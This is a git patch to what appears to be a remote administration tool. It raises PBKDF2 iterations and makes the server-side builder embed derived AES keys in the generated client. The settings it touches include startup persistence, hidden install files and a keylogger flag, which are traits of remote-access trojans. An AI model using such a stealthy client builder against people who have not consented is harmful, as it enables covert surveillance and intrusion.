From 8da6c2b352c1075bea774b3a167eb62c753c877d Mon Sep 17 00:00:00 2001 From: MaxXor Date: Fri, 8 Jul 2016 22:20:55 +0200 Subject: [PATCH] Increase iteration count and store derived keys in client #466 --- Client/Config/Settings.cs | 29 ++++++++++++------------ Client/Core/Cryptography/AES.cs | 12 +++++++--- Client/Program.cs | 2 +- Server/Core/Build/ClientBuilder.cs | 24 ++++++++++++-------- Server/Core/Cryptography/AES.cs | 6 ++--- Server/Core/Helper/CryptographyHelper.cs | 14 +++++++++++- 6 files changed, 55 insertions(+), 32 deletions(-) diff --git a/Client/Config/Settings.cs b/Client/Config/Settings.cs index 7191cebc..b6d995ac 100644 --- a/Client/Config/Settings.cs +++ b/Client/Config/Settings.cs @@ -13,7 +13,8 @@ namespace xClient.Config public static string VERSION = System.Windows.Forms.Application.ProductVersion; public static string HOSTS = "localhost:4782;"; public static int RECONNECTDELAY = 500; - public static string PASSWORD = "1234"; + public static string KEY = "1WvgEMPjdwfqIMeM9MclyQ=="; + public static string AUTHKEY = "NcFtjbDOcsw7Evd3coMC0y4koy/SRZGydhNmno81ZOWOvdfg7sv0Cj5ad2ROUfX4QMscAIjYJdjrrs41+qcQwg=="; public static Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData; public static string DIR = Environment.GetFolderPath(SPECIALFOLDER); public static string SUBFOLDER = "Test"; @@ -36,22 +37,23 @@ namespace xClient.Config } #else public static string VERSION = ""; - public static string HOSTS = "localhost:4782;"; + public static string HOSTS = ""; public static int RECONNECTDELAY = 5000; - public static string PASSWORD = "1234"; + public static string KEY = ""; + public static string AUTHKEY = ""; public static Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData; public static string DIR = Environment.GetFolderPath(SPECIALFOLDER); - public static string SUBFOLDER = "SUB"; - public static string INSTALLNAME = "INSTALL"; + public static string SUBFOLDER = ""; + public static string INSTALLNAME = ""; public static bool INSTALL = false; - public static bool STARTUP = true; - public static string MUTEX = "MUTEX"; - public static string STARTUPKEY = "STARTUP"; - public static bool HIDEFILE = true; - public static bool ENABLELOGGER = true; - public static string ENCRYPTIONKEY = "ENCKEY"; - public static string TAG = "RELEASE"; - public static string LOGDIRECTORYNAME = "Logs"; + public static bool STARTUP = false; + public static string MUTEX = ""; + public static string STARTUPKEY = ""; + public static bool HIDEFILE = false; + public static bool ENABLELOGGER = false; + public static string ENCRYPTIONKEY = ""; + public static string TAG = ""; + public static string LOGDIRECTORYNAME = ""; public static bool HIDELOGDIRECTORY = false; public static bool HIDEINSTALLSUBFOLDER = false; @@ -62,7 +64,6 @@ namespace xClient.Config TAG = AES.Decrypt(TAG); VERSION = AES.Decrypt(VERSION); HOSTS = AES.Decrypt(HOSTS); - PASSWORD = AES.Decrypt(PASSWORD); SUBFOLDER = AES.Decrypt(SUBFOLDER); INSTALLNAME = AES.Decrypt(INSTALLNAME); MUTEX = AES.Decrypt(MUTEX); diff --git a/Client/Core/Cryptography/AES.cs b/Client/Core/Cryptography/AES.cs index 449c35c0..b2848a47 100644 --- a/Client/Core/Cryptography/AES.cs +++ b/Client/Core/Cryptography/AES.cs @@ -13,7 +13,7 @@ namespace xClient.Core.Cryptography private static byte[] _defaultKey; private static byte[] _defaultAuthKey; - private static readonly byte[] Salt = + public static readonly byte[] Salt = { 0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56, 0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41 @@ -21,13 +21,19 @@ namespace xClient.Core.Cryptography public static void SetDefaultKey(string key) { - using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000)) + using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000)) { _defaultKey = derive.GetBytes(16); _defaultAuthKey = derive.GetBytes(64); } } + public static void SetDefaultKey(string key, string authKey) + { + _defaultKey = Convert.FromBase64String(key); + _defaultAuthKey = Convert.FromBase64String(authKey); + } + public static string Encrypt(string input, string key) { return Convert.ToBase64String(Encrypt(Encoding.UTF8.GetBytes(input), Encoding.UTF8.GetBytes(key))); @@ -94,7 +100,7 @@ namespace xClient.Core.Cryptography if (key == null || key.Length == 0) throw new Exception("Key can not be empty."); byte[] authKey; - using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000)) + using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000)) { key = derive.GetBytes(16); authKey = derive.GetBytes(64); diff --git a/Client/Program.cs b/Client/Program.cs index 2ffef74f..73b3836b 100644 --- a/Client/Program.cs +++ b/Client/Program.cs @@ -90,7 +90,7 @@ namespace xClient if (!MutexHelper.CreateMutex(Settings.MUTEX) || hosts.IsEmpty || string.IsNullOrEmpty(Settings.VERSION)) // no hosts to connect return false; - AES.SetDefaultKey(Settings.PASSWORD); + AES.SetDefaultKey(Settings.KEY, Settings.AUTHKEY); ClientData.InstallPath = Path.Combine(Settings.DIR, ((!string.IsNullOrEmpty(Settings.SUBFOLDER)) ? Settings.SUBFOLDER + @"\" : "") + Settings.INSTALLNAME); GeoLocationHelper.Initialize(); diff --git a/Server/Core/Build/ClientBuilder.cs b/Server/Core/Build/ClientBuilder.cs index add29789..4b3c1dac 100644 --- a/Server/Core/Build/ClientBuilder.cs +++ b/Server/Core/Build/ClientBuilder.cs @@ -22,7 +22,8 @@ namespace xServer.Core.Build public static void Build(BuildOptions options) { // PHASE 1 - Settings - string encKey = FileHelper.GetRandomFilename(20); + string encKey = FileHelper.GetRandomFilename(20), key, authKey; + CryptographyHelper.DeriveKeys(options.Password, out key, out authKey); AssemblyDefinition asmDef = AssemblyDefinition.ReadAssembly("client.bin"); foreach (var typeDef in asmDef.Modules[0].Types) @@ -47,28 +48,31 @@ namespace xServer.Core.Build case 2: //ip/hostname methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.RawHosts, encKey); break; - case 3: //password - methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Password, encKey); + case 3: //key + methodDef.Body.Instructions[i].Operand = key; break; - case 4: //installsub + case 4: //authkey + methodDef.Body.Instructions[i].Operand = authKey; + break; + case 5: //installsub methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallSub, encKey); break; - case 5: //installname + case 6: //installname methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.InstallName, encKey); break; - case 6: //mutex + case 7: //mutex methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Mutex, encKey); break; - case 7: //startupkey + case 8: //startupkey methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.StartupName, encKey); break; - case 8: //encryption key + case 9: //encryption key methodDef.Body.Instructions[i].Operand = encKey; break; - case 9: //tag + case 10: //tag methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.Tag, encKey); break; - case 10: //LogDirectoryName + case 11: //LogDirectoryName methodDef.Body.Instructions[i].Operand = AES.Encrypt(options.LogDirectoryName, encKey); break; } diff --git a/Server/Core/Cryptography/AES.cs b/Server/Core/Cryptography/AES.cs index 9f33d9b6..86c58438 100644 --- a/Server/Core/Cryptography/AES.cs +++ b/Server/Core/Cryptography/AES.cs @@ -13,7 +13,7 @@ namespace xServer.Core.Cryptography private static byte[] _defaultKey; private static byte[] _defaultAuthKey; - private static readonly byte[] Salt = + public static readonly byte[] Salt = { 0xBF, 0xEB, 0x1E, 0x56, 0xFB, 0xCD, 0x97, 0x3B, 0xB2, 0x19, 0x2, 0x24, 0x30, 0xA5, 0x78, 0x43, 0x0, 0x3D, 0x56, 0x44, 0xD2, 0x1E, 0x62, 0xB9, 0xD4, 0xF1, 0x80, 0xE7, 0xE6, 0xC3, 0x39, 0x41 @@ -21,7 +21,7 @@ namespace xServer.Core.Cryptography public static void SetDefaultKey(string key) { - using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000)) + using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000)) { _defaultKey = derive.GetBytes(16); _defaultAuthKey = derive.GetBytes(64); @@ -94,7 +94,7 @@ namespace xServer.Core.Cryptography if (key == null || key.Length == 0) throw new Exception("Key can not be empty."); byte[] authKey; - using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 2000)) + using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(key, Salt, 50000)) { key = derive.GetBytes(16); authKey = derive.GetBytes(64); diff --git a/Server/Core/Helper/CryptographyHelper.cs b/Server/Core/Helper/CryptographyHelper.cs index e1f65638..bdb844f5 100644 --- a/Server/Core/Helper/CryptographyHelper.cs +++ b/Server/Core/Helper/CryptographyHelper.cs @@ -1,4 +1,7 @@ -using System.Runtime.CompilerServices; +using System; +using System.Runtime.CompilerServices; +using System.Security.Cryptography; +using xServer.Core.Cryptography; namespace xServer.Core.Helper { @@ -25,5 +28,14 @@ namespace xServer.Core.Helper } return result; } + + public static void DeriveKeys(string password, out string key, out string authKey) + { + using (Rfc2898DeriveBytes derive = new Rfc2898DeriveBytes(password, AES.Salt, 50000)) + { + key = Convert.ToBase64String(derive.GetBytes(16)); + authKey = Convert.ToBase64String(derive.GetBytes(64)); + } + } } }